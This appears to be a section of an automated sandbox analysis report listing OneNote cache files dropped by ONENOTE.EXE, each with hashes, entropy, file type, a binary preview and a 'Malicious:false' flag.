                                                                                                                                                                                                              MD5:DC09A8416E6EC4677C543925B1DBE0CE
                                                                                                                                                                                                              SHA1:9E906C114B8831F9FF485B23ACC8039283541B24
                                                                                                                                                                                                              SHA-256:5992FCD59B1522EA69181AA263B056A52B617EE0AB64F5EAA50B82283E659B21
                                                                                                                                                                                                              SHA-512:22DD0739973ED7F1EBDA4A3D9EE3EC6AFA7389FFE43971DFC787D1D2137D798941F60DD94570500BFB0B88CF0563315B0CFDBA64F35F881E02ED04FE3758F079
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................5.......5...B<.F.{/.]c4.........................5...B<.F.{/.]c4.5....................................................5.......5...................................................5...."..5..\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s..........q}J.l.E...........N...^............................................................................................................q}J.l.E...................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7895049366358351
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:+wxRXEYuThfcxuVem2NcuT8Vh048NCOvx80cHnD2nHlXDj5DwcHnD2nHlEr37w1b:+wfEYu9zVexcXVQpsD4/wsD4CXQEmx
                                                                                                                                                                                                              MD5:0269F2C4B8F4A9B41F4CBA3C63F72C55
                                                                                                                                                                                                              SHA1:8D11760170422E148CDBD0EFBE51A1C50CF8F3AA
                                                                                                                                                                                                              SHA-256:06C15E0FF51A631CFC0C4434D6F661879413C652B314EB8EB3DD77B8466853DE
                                                                                                                                                                                                              SHA-512:EA88845A01A47E1C472EA24BA7547ED2C3E8E4AD50404BD30C2B6F7872AA4D23602C3BFFD0C23AF307538AE8A69065A47BFAA0DAA8EB9AD9A167D0849FADEE78
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................ghC.....ghC.B.L..h.U.............%2.sK..........%2.sK...........ghC.B.L..h.U..ghC...............................................................................................#.....\.......N....................................................ghC..c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...................1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........U.$...M..I..I.....N...^............................................................................................................U.$...M..I..I.....................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4833162063299943
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcu9YVXEe+gOimeyLx8Olu3afHyrw1EI8yn:VcV19rOkV38HoQEI80
                                                                                                                                                                                                              MD5:AA0B97DAD03630785F04676C8A179F3A
                                                                                                                                                                                                              SHA1:7CD8419B38CFC7B46621E7804F63C7B371F09A73
                                                                                                                                                                                                              SHA-256:2EC39F3F51F37428C0C3539C1805ACF023370C0AE8D0C350E1BAB1BF75E47D55
                                                                                                                                                                                                              SHA-512:9519567C4F01D78DF7E360AF1E78E07C20E56420C502B0F1CBCBC943664B9A96CEA426F6CDD3F0E80C00E5056A3553955772241F245D86859FB28055F9E0A523
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................~Sp.....~Sp.N.?K..O}Y.,.........................~Sp.N.?K..O}Y.,.~Sp..................................................~Sp.....~Sp.................................................~Sp.....~Sp\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...X'...oD.s...3. ....N...^...........................................................................................................X'...oD.s...3. ............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.4256912059438842
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:RZ5DyM/C+CJPD98TpootAjGwkJQhecEah:p5Dibm1ooejNzE
                                                                                                                                                                                                              MD5:96D83992D2A883D069F52A05DA4ACF31
                                                                                                                                                                                                              SHA1:7AD6AB61BB5FC36E32E5BB004D0D78B7384C5366
                                                                                                                                                                                                              SHA-256:C447E4D31D1094897A2B22B40A6F08E9D4EB30043AC414E22048838F7822E8A7
                                                                                                                                                                                                              SHA-512:6CCF4424250EBF1D68D360D8B1026E907D99F503D0E882DA3C103F3643B1BFA477A596885307BCAC84CB0E2BB070D3DA760CD5E00D14D418EDA0FC59889C0CF4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........ .............................?..................................................................................................................................................................8E......8E-...G..m...Pp@.......@..;2.N..p...n.Y0.Q..<@..{[t.Y.Y0.._..5&E...zS..O_....8E-...G..m...Pp.8E...........8E......8E..................................................8E..@...8E\.....8EN.....8EN.)...8EN.9...8EN.>..........................@....c..,.........................4..1...(...(.......U.s.e.r.........8E..1... ..$....U.s.e.r...........Y0......Y0.Q..<@..{[t.Y.@.......@..;2.N..p...n.2................................8E.@...................................._....c..,....................8E..8E..1... ..$....U.s.e.r.......`.......`.....N.$K...o._......._..5&E...zS..O@..;2.N..p...n.@...`.....N.$K...o.`...........................>................8E-...G..m...Pp.........................................`....c..,....................8E..8E..8E..1... ..$....U.s.e.r...................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7234913545987757
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Kt8lElh1HtSAuSAbX96XnqT9XlqKQEO6y:iZSFSe6XM9sKV
                                                                                                                                                                                                              MD5:E155A3BD45D6C81C1BCBBE319F547134
                                                                                                                                                                                                              SHA1:D8613C38FA98327AEA93917E722BD5ECF45D32BC
                                                                                                                                                                                                              SHA-256:7AABEF909AD2A963212B7AADC1A9EC339B2E5FFC40E579F0C906FA8BFCE4A744
                                                                                                                                                                                                              SHA-512:DC53AB016256AE9E93B364FFB61357DCEE11E4C83932C27F985356E260CAD18CC17788997120EE3CA2079C5CAF51CBB281C91A291F363486D48BBCC1FC4C6AD2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................).......)...8..G.....&.P"......."...t..B.0.dKy6g"...t..B.0.dKy6g"...)...8..G.....&.P)................................).......)...................................................)....!..)..\....)..N...................................................."....c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........)....1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...............2(.@.M.......t....N...^.............................................................................................................2(.@.M.......t............................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4780647964168284
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcBDXAs6uXsdXWyXugJeyLx8Olu3afNNlwww1EBNlwM:VcBDQs6GsJW6UV38iwQEmM
                                                                                                                                                                                                              MD5:FCAD9A3BAB53C854AE1D734ABAA0884C
                                                                                                                                                                                                              SHA1:751DE9371A62B33A23C0A3B2199B69A984AD1751
                                                                                                                                                                                                              SHA-256:D1108AF8E56925852D7BE3B1C985299B0F20492BE68DB1DD20E168CA178DD8B8
                                                                                                                                                                                                              SHA-512:E8312DBF7C79C77F1FC902C4A43519A031F56BFA08893B8D9FC3BD65E288CC07A8F2F92AA36C7D50FEA01E9CE1344B7C2E399D1F3B81A9AF7BFD888BF478EE99
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................2s......2s....I...A...........................2s....I...A...2s...................................................2s......2s..................................................2s......2s.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.....1O7h.K..O..K......N...^.............................................................................................................1O7h.K..O..K..............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7331743113034986
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:KUCBQR5MX3t1lkueIWxD7eIWc1z4EwQEy4E/0:KUKEeXd1iuAD7R4rG4k
                                                                                                                                                                                                              MD5:38659B63858064AEE8388C06E5D5013E
                                                                                                                                                                                                              SHA1:53ED5098A99154F62A886E2011341E48530203E3
                                                                                                                                                                                                              SHA-256:6125F441E1640B662C14FC214D0A9F1B6B225C4B1C5C6307E52F8EC349DDFDEF
                                                                                                                                                                                                              SHA-512:FFA734BA7DA6B5832A68DE2B154F8407E19452807104B2926BAD7E3BDADB1C17035D466AA3D80A659632C937C472DBED9E1B38924E545BA861A6CBD858FD0A68
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................4.......4.3.{H..%}&..B.8.......8.. M.J.z'u.. (..4.3.{H..%}&..B..4..8.. M.J.z'u.. (.8.................................4.......4...................................................4.."....4\......4N.....................................................8...c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s................4..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........r..V.eD...c..)....N...^...........................................................................................................r..V.eD...c..)....................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.48270824124316003
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcUR/2FRgl/lqtlwXeyLx8Olu3afEy4opw1EOGP+y4oJ:VcUpEml/lIlwXeV380mQEhaW
                                                                                                                                                                                                              MD5:4D17AB59BEC6484170297FAF74B91871
                                                                                                                                                                                                              SHA1:E04E22341A9912990EF87F061729292702E64720
                                                                                                                                                                                                              SHA-256:F976683BD2ABBC400C06FC4F7A10BFF91318500304DA24B848C7384F95820E5D
                                                                                                                                                                                                              SHA-512:D7EFD3B02BB1FA3077E3FC497097292BCFEE81F579E3D8CE74A3AE78DB96498285A00CF94790CFC10792299FE4A1489B15452BBD062D5F9C9E6870F263BBC026
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~....................................................................................................................................................................................................l.J..Z...+..............................l.J..Z...+.............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.....*..7hK..i..y.,....N...^.............................................................................................................*..7hK..i..y.,............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6420427423505781
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:UWBEEelFVu3K/0Sl0MbELx88cbrMkq2Sz1MQQcbrMkq2Sz1pXaYw1EcrXak:UeEEejMhSonkNYKQQnkNYHlQEcrN
                                                                                                                                                                                                              MD5:238CE97FF8F6DBC3D8187A553BD9752B
                                                                                                                                                                                                              SHA1:81770306FE9C23FD0162B033F0611894D3121F0A
                                                                                                                                                                                                              SHA-256:AE5ABADC2EDD6560015CD6D7E814ADC9EA5F4CB69883F63C60D21733E6859A66
                                                                                                                                                                                                              SHA-512:E620E63CF0C2006E7E3B3FFBBC1FD403598B54455EDC8595369BAE2632617CC8DD3AC1395A732CF27926796087233FBD2FCF47F5181AAA17A476D509EBC6D06A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................3x......3x..g..F.$..b.\.........................3x..g..F.$..b.\.3x...................................................3x......3x..................................................3x..."..3x.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s............0.=.D.r.?.T......N...^..............................................................................................................0.=.D.r.?.T..............................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7863096374167515
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:+wxRXEi/+pc4vPauqc4vPiO+GMl0mcehIx80cHnD2nHlXtnWldwcHnD2nHlENHcr:+wfEjcLcxO+GXsD4TnWnwsD4CKyQE7q
                                                                                                                                                                                                              MD5:481580A0CB0F1AA082A2E79484D2C2D0
                                                                                                                                                                                                              SHA1:41AF8A7C3AEA1D8B6F18EB3BC4505FD218A55B08
                                                                                                                                                                                                              SHA-256:45AC1F99B32C6F83CA172F30ECE7217A71EAC669E697FF8AC585AB6B4B89301E
                                                                                                                                                                                                              SHA-512:CDF82A654DE829BF9E6A6B84190FBC979781FA9FF8F74C615AD3B9387A621BCB34BCF986AEA4B696ED8362BDED144C4B9C54BBEDB578A3FF0289D4D695CA960E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>....................................................................................................................................................................................................J.......J....5D.e.4.....i.......i..a(F..dJ.V0.J....5D.e.4....J....i..a(F..dJ.V0..i................................i.......i...................................................i..#....i\......iN.....................................................J...c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s................i..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...........".^.9H.4/.?.,(....N...^.............................................................................................................".^.9H.4/.?.,(....................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4777403822425683
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcQZaLw/akXXk/dRlJlyLx8Olu3afwe1Zlcw1Eh1XlK:VcQYLwikXwvrV38wCbcQEPX0
                                                                                                                                                                                                              MD5:EA8F396262EDACD6216E821D951EC473
                                                                                                                                                                                                              SHA1:66857BB743602B589DA95648AF08D39000C4A620
                                                                                                                                                                                                              SHA-256:03C01F454BA8A14330024AE1EDAAEC2A82452153536A96F3DEAD5374BF13D2A2
                                                                                                                                                                                                              SHA-512:D42CC55D0A3C010AF942229E80E82230AF22EF2FE0FA396C669CBD51640E8EBACB3642D4854B24D94E92C33C061CCA5C50E9BAF6A02ECDF88EC1FCAF25E11DA4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~..................................................................................................................................................................................................P...C..9'..d...........................P...C..9'..d............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...%{}.Ot.F.:.t.......N...^...........................................................................................................%{}.Ot.F.:.t...............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.009518182117983
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:DKKOkZkFOEYXDwVT1AOkBNb5r7ZMNwOE8DQE9P:DboVmFr7ZjOE8DJ
                                                                                                                                                                                                              MD5:C23A30FDE3B68C99E2CD6904E4B2C32B
                                                                                                                                                                                                              SHA1:BD30BDE85F735E0C6E0D2689FD44D2059BD6B7C7
                                                                                                                                                                                                              SHA-256:8B2DAA6B9309B10381DF06BD6AF0A20F02FAB97892372F0356B01738BB142443
                                                                                                                                                                                                              SHA-512:52C5EE44663E7706974F293AD819757935CA764CE7BA4D0FBD4453B3ED35D5C0120D0F51848A151E3492EF9E5A51D5E789250597E84B978E49AD8CAF96FDA366
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>..........................?......?..................................................................................................................................................................DP......DP..B.%*^.^...!.......!..lqF.......DP..B.%*^.^...DP..!..lqF.......!..d...U.N..Yiz:..d.............!.......!...................................................DPN.(...!...-...!.\......................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...................DP.. ..$...........!.......!..lqF......d.......d...U.N..Yiz:..2................................DP......................................d....c..,....................DP.. ..$p................nO...&..............DP.. ..$p...............?.@.\.q6.........%.....C.0$.o..\....N...^...........................................................................................................%.....C.0$.o..\....................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.9841489332485079
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:BKKQ83TuWATCfJS15ENWQ0ZfsQ5QEc20:nDHgCJJAQkkQ5g2
                                                                                                                                                                                                              MD5:C42D6F044D16A5432319F21B3314354F
                                                                                                                                                                                                              SHA1:4E02BFD386243E5C32C21C1E5029F9FAB8A8DB68
                                                                                                                                                                                                              SHA-256:B36EFD1220BE59F0DFDA42876B904B36B0F529BF891412FACECBF03CADC4D620
                                                                                                                                                                                                              SHA-512:BB5C58FBC56C30392D373BD7D753C88847C27F11F5BEAF0266FEA576A40255BD736E497C468917E9263B648DF551FF8AB30069BDDD121042B5709D5F252425DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>.............................?...?..............................................................................................................................................................................R^J.WiM................T,.D.B..P...^.M.h.C.D`..+..^.M.....T,.D.B..P...........R^J.WiM..................................................................................,.....\.......N.......N.)............................................4..1...(...(.......1.6.............................c..,........................ ..$..........^.M.....^.M.h.C.D`..+.............T,.D.B..P...2........................................................................^.M..c..,............................ ..$.................... ..$p..............0.^.E..\._G.............a..|~O.u./xo.-....N...^............................................................................................................a..|~O.u./xo.-....................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.5820121577250665
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:4DVra+Wo54T1R3GWJQRJoll9ljMz0erle:QWRT1VhOXtle
                                                                                                                                                                                                              MD5:A14F2271199C55D3DF1EAC68EC8ABF10
                                                                                                                                                                                                              SHA1:05993119B2F51D64F77632976E72B87F8ADC1F0A
                                                                                                                                                                                                              SHA-256:599B1D390BE05D75999F7A24566A7D9F952B366BF9A9106074F8F2250ACE05A2
                                                                                                                                                                                                              SHA-512:64A4F137C4E7D60B066D5312F36A4310302336D990C5BE601373965B3177669F622BA3F184E1857CE7F2C56B00482E4CB56F9520D6A48720AE3215A9CB909DD1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........0..............................................................................................................................................................................................................B..P..................rO.n..t`9........B..P.......z...h(.D.X1..*3.z.........rO.n..t`9z..............................................................................C.....\.......N.......N.).....N.8.....N.?............................4..1...(...(.......M.a.n.a.g.e.d......................z....c..,........................ ..$..........z.......z...h(.D.X1..*3...............rO.n..t`9.2...................................z.........................................c..,............................ ..$..................t..K..`.T.................rO.n..t`9.....t..K..`.T...........X..L.ofWW.............rO.n..t`9z........>...............z...h(.D.X1..*3...............................................c..,................................ ..$......................X..L.ofWW.................rO
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7659880616595501
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:bE9M0iV2Gdc0ieg3tay2HILx8CAXCV2Lk/s1dPl/iHUOqw1E3UOS:bE9MV2GiT9arIYXdk01ddqHUFQE3Ut
                                                                                                                                                                                                              MD5:D1E986B500ACBD5A56272BCDDDD68F8D
                                                                                                                                                                                                              SHA1:AEEFAF3A677D22FC9DB8994FFFDA4436CE886F86
                                                                                                                                                                                                              SHA-256:EC726E170E9A2222765DB486227E95A63A7F5077CBE0342387DFC4199DBD3429
                                                                                                                                                                                                              SHA-512:217A067893CAA7F227E62804D7AF8B3EE7520063C974E13E5DB1A01F1F9C231120EB55846C033DA8A297FA78440DEF28524F7C477FF29B956A54AB7A0868859E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>..............................................................................................................................................................................................................7m.&C.]....2>......2>...K.D.A.$.....7m.&C.].........2>...K.D.A.$...2>...............................................................................................#.....\.......N. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.......................2>..c..,........................ ..$.................... ..$p...........!.e..d2F......p..........s..yE.+J.W:......N...^..............................................................................................................s..yE.+J.W:..............................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.5230478487912221
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzckb4czAtWxi+eyLx8Olu346s5PrZmw1E9HPrX0:jRckbfTxreV3fs5PrYQE9HPrX0
                                                                                                                                                                                                              MD5:961FA851152EC4A3EB777E90ACA0B1EC
                                                                                                                                                                                                              SHA1:8F2033600E95C4EF932273F2860B68837C41D49F
                                                                                                                                                                                                              SHA-256:B9AA5F39375E60D0AD72EF3AF6879A9CCE050B9E72EDFF99C529ED19B3E63EA3
                                                                                                                                                                                                              SHA-512:71D95DD501B1FB5150CDF951C3A4155B2E44B2A1D064303D1C287FD4190045C92039092C333FF38735EE71658A03187759436051AAC20C14F26411522AD25E5E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>..................................................................................................................................................................................................................N...@..*................................N...@..*.............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.................p.........P.D~zF.i...."G...............&E.*z........N...^................................................................................................................&E.*z........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7670811242781124
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:D0CdMSTv0WA5bVtseIWHw1S1NMdVYQEPk:Q7Sr5w62wEM4
                                                                                                                                                                                                              MD5:CA2803BA9D6E8E355376BD4D493A0309
                                                                                                                                                                                                              SHA1:EE1EA0FBB6D9FA7A20EA5C5A34836DD41AE454EB
                                                                                                                                                                                                              SHA-256:5112C5DB625EC6F2DDD3EE3EEDF16F8A8205663DD7058762F5D8ED236B8F54A9
                                                                                                                                                                                                              SHA-512:E10377B38E1C42F3BEE75B654F549303DA78BA030FF679F0E8BC1770CB0CC2B51B20ADBB523F2DEB6EAAB98B9B213A1FD8BA8AB09E44589E17FC258A34BE3B81
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>....................................................................................................................................................................................................^K......^K..W.A.T.9,2ao.>.......>....O..Y.8.z4.^K..W.A.T.9,2ao.^K..>....O..Y.8.z4.>................................>.......>...................................................>...$...>.\.....>.N. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s...........................^K..c..,....................>... ..$................>... ..$p...........7..._4O..)...........wl&.&D..z........N...^............................................................................................................wl&.&D..z........................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.5292000863921095
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzciklKaclqtyLx8Olu3Lt5dLYw1E9QLk:jRcVAaclqtV3Zv0QE9QI
                                                                                                                                                                                                              MD5:0CE4E887B5DE7B6BD8BF1E7DA55ABF29
                                                                                                                                                                                                              SHA1:9C3741038264A6941D94610D86D4E2F8956668D0
                                                                                                                                                                                                              SHA-256:07A35A6DCCE34A3AC27B1AAEAD445E5E92281C2040D43FAA6CCAB275F4E24E4E
                                                                                                                                                                                                              SHA-512:748A86977C40C373EBBA5B1C62C4C08B08390C1AC794B0AE8EFF043BE0E7F92CB913478DEB255947B36E284C791D8F26B3E961F8750555A2082AC7A16B657308
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................ej......ej.cn~oK..]*B..N........................ej.cn~oK..]*B..Nej...................................................ej......ej..................................................ej......ej.\..............................................................4..1...(...(.......1.0.3.3.................p........ZW...kA..b0.].v...........@.5...H....i+....N...^............................................................................................................@.5...H....i+....................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6075400206860104
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:90CLQhMjOVghMjJFElsRLx88cbrMkq2Sz1sgtBXYiljqw1EIiljS:eCRiVnkNYq+FYGjqQEIGjS
                                                                                                                                                                                                              MD5:B6F820E43955FAB90030F33AFCBA42A8
                                                                                                                                                                                                              SHA1:81CDF7EAE9B8510F71C07659FE7F52AD53EE94D0
                                                                                                                                                                                                              SHA-256:2BCA5C6B946B99A1DBF0B1FAD2BF92590459826D9E91B7CFCC7A7C97BA297517
                                                                                                                                                                                                              SHA-512:A89086B2395931DC8D5D036DA1CE8EBBFC06BF41E39C80556CE96912DC08FEA9FE47CD484B7E7D8C6CE6753B41ECBD6A34F4D5E23BCCE9126E48DAFF1CCE4B13
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................w.......w..o.A....u.y:..........................w..o.A....u.y:..w....................................................w.......w...................................................w.."....w\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p...........o.E.8..u.s...........X*H..H.H..4.........N...^...........................................................................................................X*H..H.H..4.........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.8099194123700107
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:EEWrqQE1nuaFtKWcFDvsD4Odn1mFdUcQE41:4qfnvPcxnmgsc
                                                                                                                                                                                                              MD5:A9D1F36B03CEB598F9FD2717E4B978CB
                                                                                                                                                                                                              SHA1:6C394F26AE6CCFF169105CBC9A284C331D651CAA
                                                                                                                                                                                                              SHA-256:DE355904AF21580A4FABD9F3876E59674B26CF1727D480DA72AC0D237A2D48ED
                                                                                                                                                                                                              SHA-512:EF079766DAA5FC433079958BF1A7B32DA283B9EBEDF0F39FF6B6A186D97A72598AE75830FD9BBB1A10142ABE1DF4B281A86788D7EBB14DE3C718EC15F2171A04
                                                                                                                                                                                                              Malicious:false
